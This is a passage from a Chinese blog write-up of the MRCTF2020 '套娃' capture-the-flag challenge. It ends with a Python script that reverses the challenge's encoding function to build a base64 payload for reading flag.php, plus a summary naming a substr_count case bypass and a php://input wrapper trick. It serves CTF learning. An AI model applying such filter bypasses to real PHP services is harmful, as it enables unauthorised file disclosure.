        re <span class="token operator">+=</span> <span class="token builtin">chr</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token builtin">ord</span><span class="token punctuation">(</span>v<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">+</span> i<span class="token operator">*</span><span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">)</span>  
          
    <span class="token keyword">return</span> re  
  
<span class="token keyword">def</span> <span class="token function">unchange</span><span class="token punctuation">(</span>fileName<span class="token punctuation">)</span><span class="token punctuation">:</span>  
    payload <span class="token operator">=</span> <span class="token string">''</span>  
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token builtin">len</span><span class="token punctuation">(</span>fileName<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">:</span>  
         payload <span class="token operator">+=</span> <span class="token builtin">chr</span><span class="token punctuation">(</span><span class="token builtin">ord</span><span class="token punctuation">(</span>fileName<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">2</span><span class="token operator">*</span>i<span class="token punctuation">)</span>  
  
    payload <span class="token operator">=</span> base64<span class="token punctuation">.</span>b64encode<span class="token punctuation">(</span>payload<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment"># str -> byte  </span>
    <span class="token keyword">return</span> payload<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span>  
  
<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">'__main__'</span><span class="token punctuation">:</span>  
    fileName <span class="token operator">=</span> <span class="token string">'flag.php'</span>  
    payload <span class="token operator">=</span> unchange<span class="token punctuation">(</span>fileName<span class="token punctuation">)</span>  
    <span class="token keyword">print</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span>  <span class="token comment"># 最终的payload</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>change<span class="token punctuation">(</span>payload<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment"># 验证是否正确</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre></p>
<p>最后得到payload为：ZmpdYSZmXGI=</p>
<p><img src="https://raw.githubusercontent.com/hdfzzf/Figurebed/main/imgs/20220421095706.png" /></p>
<h1 id="总结">3. 总结</h1>
<p>考察了：</p>
<ul>
<li>substr_count()区分大小写</li>
<li>php://input伪协议绕过</li>
<li>函数逆向</li>
</ul>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BF%A1%E6%81%AF"><span class="toc-number">1.</span> <span class="toc-text">1. 题目信息</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98"><span class="toc-number">2.</span> <span class="toc-text">2. 解题</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="toc-number">2.1.</span> <span class="toc-text">2.1. 前置知识</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#server"><span class="toc-number">2.1.1.</span> <span class="toc-text">2.1.1. $_SERVER</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#substr_count"><span class="toc-number">2.1.2.</span> <span class="toc-text">2.1.2. substr_count()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#preg_matchpattern-string"><span class="toc-number">2.1.3.</span> <span class="toc-text">2.1.3. preg_match(pattern, string)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#getip"><span class="toc-number">2.1.4.</span> <span class="toc-text">2.1.4. getIp()</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="toc-number">2.2.</span> <span class="toc-text">2.2. 解题过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%97%E5%A8%831"><span class="toc-number">2.2.1.</span> <span class="toc-text">2.2.1. 套娃1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A5%97%E5%A8%832"><span class="toc-number">2.2.2.</span> <span class="toc-text">2.2.2. 套娃2</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">3. 总结</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&text=MRCTF2020 套娃"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&is_video=false&description=MRCTF2020 套娃"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=MRCTF2020 套娃&body=Check out this article: https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&title=MRCTF2020 套娃"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&name=MRCTF2020 套娃&description=&lt;p&gt;题目地址：&lt;a href=&#34;https://buuoj.cn/challenges#%5BMRCTF2020%5D套娃&#34;&gt;MRCTF2020 套娃&lt;/a&gt;&lt;/p&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://hdfzzf.github.io/2022/04/21/MRCTF2020%20%E5%A5%97%E5%A8%83/&t=MRCTF2020 套娃"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2022
    hdfzzf
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'cactus-1';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
